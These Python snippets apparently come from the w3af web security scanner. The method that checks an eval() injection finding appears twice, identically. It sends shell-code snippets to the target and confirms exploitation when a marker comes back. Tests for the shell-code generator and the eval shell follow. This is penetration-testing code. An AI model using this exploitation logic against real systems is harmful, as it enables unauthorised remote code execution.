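def _verify_vuln(self, vuln_obj):
    """
    Check whether the eval() finding in vuln_obj can really be exploited.

    Every entry returned by shell_handler.get_shell_code() is tried in turn:
    its code is set as the token value of a copy of the finding's mutant, the
    mutant is sent with self._uri_opener, and the finding counts as confirmed
    when the response body contains shell_handler.SHELL_IDENTIFIER. On the
    first confirmation the matching generator is stored in
    self._shellcode_generator.

    :param vuln_obj: The vulnerability to verify.
    :return: True if one of the snippets was confirmed, False otherwise.
    """
    # The file extension of the vulnerable URL is passed to the shell handler
    # when asking for candidate snippets.
    extension = vuln_obj.get_url().get_extension()

    # Verification asks for snippets built around an empty command string.
    null_command = ''
    shell_code_list = shell_handler.get_shell_code(extension, null_command)

    for code, _real_extension, shellcode_generator in shell_code_list:
        # A copy is modified, presumably so the mutant kept by the finding
        # stays untouched -- TODO confirm copy() semantics.
        mutant = vuln_obj.get_mutant().copy()
        mutant.set_token_value(code)

        try:
            http_res = self._uri_opener.send_mutant(mutant)
        except BaseFrameworkException as w3:
            # A failed request is only logged; the next candidate is tried.
            msg = ('An error occurred while trying to exploit the eval()'
                   ' vulnerability. Original exception: "%s".')
            om.out.debug(msg % w3)
            continue

        # NOTE(review): this is a plain substring test on the body. If the
        # identifier also appears literally inside `code`, a response that
        # merely reflects the input would match as well -- confirm how
        # get_shell_code() builds the snippet.
        if shell_handler.SHELL_IDENTIFIER in http_res.get_body():
            msg = ('Successfully exploited eval() vulnerability using'
                   ' the following code snippet: "%s...".' % code[:35])
            om.out.debug(msg)
            self._shellcode_generator = shellcode_generator
            return True

    # No candidate was confirmed. Return False explicitly so the result
    # matches the documented boolean contract instead of falling through
    # with None.
    return False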
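def _verify_vuln(self, vuln_obj):
    """
    Check whether the eval() finding in vuln_obj can really be exploited.

    Every entry returned by shell_handler.get_shell_code() is tried in turn:
    its code is set as the token value of a copy of the finding's mutant, the
    mutant is sent with self._uri_opener, and the finding counts as confirmed
    when the response body contains shell_handler.SHELL_IDENTIFIER. On the
    first confirmation the matching generator is stored in
    self._shellcode_generator.

    :param vuln_obj: The vulnerability to verify.
    :return: True if one of the snippets was confirmed, False otherwise.
    """
    # The file extension of the vulnerable URL is passed to the shell handler
    # when asking for candidate snippets.
    extension = vuln_obj.get_url().get_extension()

    # Verification asks for snippets built around an empty command string.
    null_command = ''
    shell_code_list = shell_handler.get_shell_code(extension, null_command)

    for code, _real_extension, shellcode_generator in shell_code_list:
        # A copy is modified, presumably so the mutant kept by the finding
        # stays untouched -- TODO confirm copy() semantics.
        mutant = vuln_obj.get_mutant().copy()
        mutant.set_token_value(code)

        try:
            http_res = self._uri_opener.send_mutant(mutant)
        except BaseFrameworkException as w3:
            # A failed request is only logged; the next candidate is tried.
            msg = ('An error occurred while trying to exploit the eval()'
                   ' vulnerability. Original exception: "%s".')
            om.out.debug(msg % w3)
            continue

        # NOTE(review): this is a plain substring test on the body. If the
        # identifier also appears literally inside `code`, a response that
        # merely reflects the input would match as well -- confirm how
        # get_shell_code() builds the snippet.
        if shell_handler.SHELL_IDENTIFIER in http_res.get_body():
            msg = ('Successfully exploited eval() vulnerability using'
                   ' the following code snippet: "%s...".' % code[:35])
            om.out.debug(msg)
            self._shellcode_generator = shellcode_generator
            return True

    # No candidate was confirmed. Return False explicitly so the result
    # matches the documented boolean contract instead of falling through
    # with None.
    return False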
def test_get_shell_code_invalid_extension(self):
    """
    get_shell_code() with the extension '123456' (treated as invalid by this
    test's name) returns two entries, the first of which is PHP code that
    contains 'echo '.
    """
    candidates = get_shell_code('123456', self.TEST_CMD)
    self.assertEqual(len(candidates), 2)

    # Each entry is a 3-tuple; only the code and its language are checked.
    first_code, first_lang, _generator = candidates[0]

    self.assertEqual(first_lang, 'php')
    self.assertIn('echo ', first_code)
def test_get_shell_code_extension_force(self):
    """
    get_shell_code('php', ..., True) returns exactly one entry, and that
    entry is PHP code containing 'echo '.
    """
    # The third positional argument is presumably the "force extension"
    # switch the test name refers to -- verify against get_shell_code().
    candidates = get_shell_code('php', self.TEST_CMD, True)
    self.assertEqual(len(candidates), 1)

    # Each entry is a 3-tuple; only the code and its language are checked.
    only_code, only_lang, _generator = candidates[0]

    self.assertEqual(only_lang, 'php')
    self.assertIn('echo ', only_code)
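def test_kb_list_shells_eval_2181(self):
    """
    An EvalShell appended to the knowledge base is returned by
    kb.get_all_shells() equal to the original and bound to the core's own
    uri_opener and worker_pool.

    :see: https://github.com/andresriancho/w3af/issues/2181
    """
    w3af_core = w3afCore()

    # quit() sits in a finally block so the core is shut down even when one
    # of the assertions fails and aborts the test early.
    try:
        shellcodes = get_shell_code('php', 'ls')
        # Third element of the first entry is the shellcode generator.
        shellcode_generator = shellcodes[0][2]

        shell = EvalShell(MockVuln(), w3af_core.uri_opener,
                          w3af_core.worker_pool, shellcode_generator)
        kb.append('a', 'b', shell)

        shells = kb.get_all_shells(w3af_core=w3af_core)
        self.assertEqual(len(shells), 1)

        # NOTE(review): the name suggests the kb hands back a deserialized
        # copy rather than the stored object -- confirm in get_all_shells().
        unpickled_shell = shells[0]
        self.assertEqual(shell, unpickled_shell)

        # Identity, not equality: the returned shell must reference the
        # core's own opener and worker pool objects.
        self.assertIs(unpickled_shell._uri_opener, w3af_core.uri_opener)
        self.assertIs(unpickled_shell.worker_pool, w3af_core.worker_pool)

        # The generator's arguments must match those of the original shell.
        self.assertEqual(unpickled_shell.shellcode_generator.args,
                         shell.shellcode_generator.args)
    finally:
        w3af_core.quit()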